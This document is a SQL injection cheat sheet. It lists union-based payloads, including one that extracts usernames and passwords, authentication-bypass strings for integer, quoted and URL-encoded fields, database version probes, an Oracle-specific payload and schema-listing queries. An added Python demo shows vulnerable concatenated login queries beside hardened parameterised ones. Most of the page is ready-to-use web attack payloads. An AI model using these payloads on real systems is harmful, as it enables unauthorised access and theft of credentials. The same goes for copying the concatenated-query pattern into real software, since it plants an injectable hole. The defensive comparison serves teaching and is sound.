SQL Injection

Various SQL injection payloads.

Union Based

 or 1=1#

1' ORDER BY 10#

1' UNION SELECT version(),2#

1' UNION SELECT version(),database()#

1' UNION SELECT version(),user()#

1' UNION ALL SELECT table_name,2 from information_schema.tables#

1' UNION ALL SELECT column_name,2 from information_schema.columns where table_name = "users"#

1' UNION ALL SELECT concat(user,char(58),password),2 from users#

Integer

Consider a form with no client-side validation, where the user field accepts only an integer alongside a password. This input could bypass the check:

1 or 1=1-- -

String escape

Consider a form with no client-side validation, where the user field is placed in the query as a quoted string like 'input'. This input could bypass the check:

1' or '1'='1'-- -

URL injection

Consider a form whose client-side validation blocks special characters, where the user field is placed in the query as a quoted string like 'input'. This input could bypass the check:

1' or '1'='1'-- -

Encoded in URL

%31%27%20%6f%72%20%27%31%27%3d%27%31%27%2d%2d%20%2d
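
Why the integer, string and URL-encoded inputs above succeed against concatenated SQL, and how server-side type checks and bound parameters stop them. This is an added example, not part of the original page; the users table, its sample rows and the function names are assumptions, and it runs against an in-memory SQLite database.

```python
import sqlite3
from urllib.parse import unquote

def make_db():
    """In-memory SQLite table with constructed sample accounts (demo only)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return db

def login_concat_int(db, user_id, password):
    """Vulnerable: integer field pasted into the SQL text unquoted."""
    sql = f"SELECT name FROM users WHERE id = {user_id} AND password = '{password}'"
    return sorted(row[0] for row in db.execute(sql))

def login_concat_str(db, name, password):
    """Vulnerable: string field pasted between single quotes."""
    sql = f"SELECT name FROM users WHERE name = '{name}' AND password = '{password}'"
    return sorted(row[0] for row in db.execute(sql))

def login_bound_int(db, user_id, password):
    """Hardened: server-side type check, then bound parameters."""
    uid = int(user_id)  # raises ValueError for "1 or 1=1-- -"
    sql = "SELECT name FROM users WHERE id = ? AND password = ?"
    return sorted(row[0] for row in db.execute(sql, (uid, password)))

def login_bound_str(db, name, password):
    """Hardened: the driver passes values as data, never as SQL text."""
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return sorted(row[0] for row in db.execute(sql, (name, password)))

if __name__ == "__main__":
    db = make_db()
    int_input = "1 or 1=1-- -"
    str_input = "1' or '1'='1'-- -"
    # The server decodes percent-encoding before the query is built, so a
    # client-side character filter never sees the quote characters.
    url_input = unquote("%31%27%20%6f%72%20%27%31%27%3d%27%31%27%2d%2d%20%2d")
    print(login_concat_int(db, int_input, "wrong"))   # every account matches
    print(login_concat_str(db, str_input, "wrong"))   # every account matches
    print(url_input == str_input)                     # same string after decoding
    print(login_bound_str(db, url_input, "wrong"))    # no account matches
    print(login_bound_str(db, "alice", "pw-alice"))   # normal login still works
```

The passwords are stored in plain text only to keep the demo short; the point is that the bound versions treat the whole input as a value to compare, so the trailing comment never removes the password check.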

Find database version

SQL

SELECT @@version

',nickName=@@version,email='

SQLite

',nickName=(sqlite_version())"'

Oracle

SELECT * FROM v$version

',nickName=(SELECT banner FROM v$version),email='

PostgreSQL

SELECT version()

Database-specific syntax

Oracle

On Oracle, every SELECT query must use the FROM keyword and specify a valid table. There is a built-in table on Oracle called dual which can be used for this purpose.

' UNION SELECT NULL FROM DUAL--

Listing the contents of the database

List tables in database

SELECT * FROM information_schema.tables

List columns in a table

SELECT * FROM information_schema.columns WHERE table_name = 'Users'

Blind SQL injection

Blind SQL injection occurs when an application is vulnerable to SQL injection, but its HTTP responses do not contain the results of the relevant SQL query or the details of any database errors.
